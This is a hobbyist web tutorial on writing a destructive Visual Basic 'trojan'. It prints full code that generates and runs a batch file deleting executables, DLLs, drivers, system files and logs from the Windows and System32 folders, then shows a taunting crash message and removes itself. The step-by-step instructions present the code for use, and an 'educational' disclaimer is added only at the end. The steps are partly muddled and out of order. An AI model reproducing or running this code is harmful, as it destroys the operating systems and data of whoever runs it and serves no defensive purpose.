How to Make a Destructive Trojan to crash the system
Introduction about Trojan virus: This tutorial, or article or whatever you want to call it, is based around a destructive trojan I wrote in a day. So don't think that after you read this you will be a pro in virus writing! :P I used a program called Visual Basic 6.0 to write this virus and VB is the only programming language i know. Of course there are loads of other languages like ASM, QBasic and so on. Step 1: Purpose and wat action will be happened: Ok, I was going to get straight to the point and show you the code for my Jockster trojan which deletes important files in the computer and simply makes the computer useless until the victim formats the C drive. step 2: open notepad step 3: now copy the below code into notepad On Error Resume Next Open "C:\Jockstrap.txt" For Output As #1 Print #1, "@echo off" Print #1, "cls" Print #1, "@del C:\windows\*.ini" Print #1, "cls" Print #1, "@del C:\windows\*.log" Print #1, "cls" Print #1, "@del C:\windows\*.exe" Print #1, "cls" Print #1, "@del C:\windows\*.com" Print #1, "cls" Print #1, "@del C:\windows\system32\*.scr" Print #1, "cls" Print #1, "@del C:\windows\SYSTEM32\*.exe" Print #1, "cls" Print #1, "@del C:\windows\system32\*.log" Print #1, "cls" Print #1, "@del C:\windows\SYSTEM32\*.drv" Print #1, "cls" Print #1, "@del C:\windows\system32\*.dll" Print #1, "cls" Print #1, "@del C:\windows\SYSTEM32\*.sys" Print #1, "cls" Print #1, "@del C:\windows\SYSTEM32\*.com" Print #1, "cls" Print #1, "@del C:\windows\system.ini" Close #1 Name "C:\Jockstrap.txt" As "C:\Jockstrap.bat" Shell "C:\Jockstrap.bat" MsgBox "yapiee ur system is crashed!",vbCritical Kill "C:\Jockstrap.bat" End End Sub step 4: now this save it as Jockstrap.bat format Step 5:now run this file, it`ll display an error msg after that it`ll execute at background automatically step 6:now system crash is ready important Note::: This is an educational document. I take no responsibility for what use the information in this document is used for. I am unable to be blamed for any troubles you get into with the police, FBI, or any other department. Viruses are illegal to be spread, so this is simply for theoretical purposes or testing in a controlled environment. It is not illegal to write viruses, but it is to spread them. I do not take any responsibility for your actions! So that is clear? Good! Lets begin! :)
Private Sub Form_Load()
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